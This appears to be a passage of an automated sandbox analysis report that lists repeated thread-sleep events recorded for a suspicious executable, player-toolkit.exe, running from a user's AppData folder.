Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39486s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39376s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39267s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39048s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38939s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38720s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38611s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38498s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38392s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38283s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38173s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -38064s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37845s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37736s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37626s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37517s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37298s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37189s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -37079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36970s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36861s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36530s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36423s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36314s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -36095s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35986s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35767s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35657s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35548s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35439s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35220s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35111s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -35001s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34783s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34345s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33798s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33689s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33470s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33361s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33207s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -33095s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32986s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32767s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32658s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32548s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32439s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32220s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32111s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -32001s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31673s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31564s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31345s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -31016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30798s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30685s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30470s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30361s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30142s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -30033s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59897s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59788s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59679s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59565s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59404s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59303s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59193s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -59084s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58970s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58864s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58756s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58288s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58177s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -58049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -57867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56974s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56413s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56304s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56193s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -56085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55975s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55757s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55427s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55319s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55210s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -55100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54987s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54880s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54772s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54663s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54554s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54444s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54334s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54226s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54116s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -54006s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53897s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53788s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53679s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53569s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53459s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53350s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53241s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53131s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -53022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52912s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52804s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52693s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52584s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52475s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52366s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52257s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52147s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -52038s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51929s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51819s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51710s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51491s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51382s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51272s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51163s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -51054s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50944s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50725s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50616s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50506s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50397s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50288s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50178s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -50069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49960s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49850s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49740s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49631s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49413s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49303s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49194s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -49085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48975s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48757s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48429s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48319s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48208s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -48100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47991s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47881s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47772s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47663s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47553s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47444s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47335s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47224s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47116s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -47006s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46897s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46788s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46678s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46569s >= -30000s	Jump to behavior
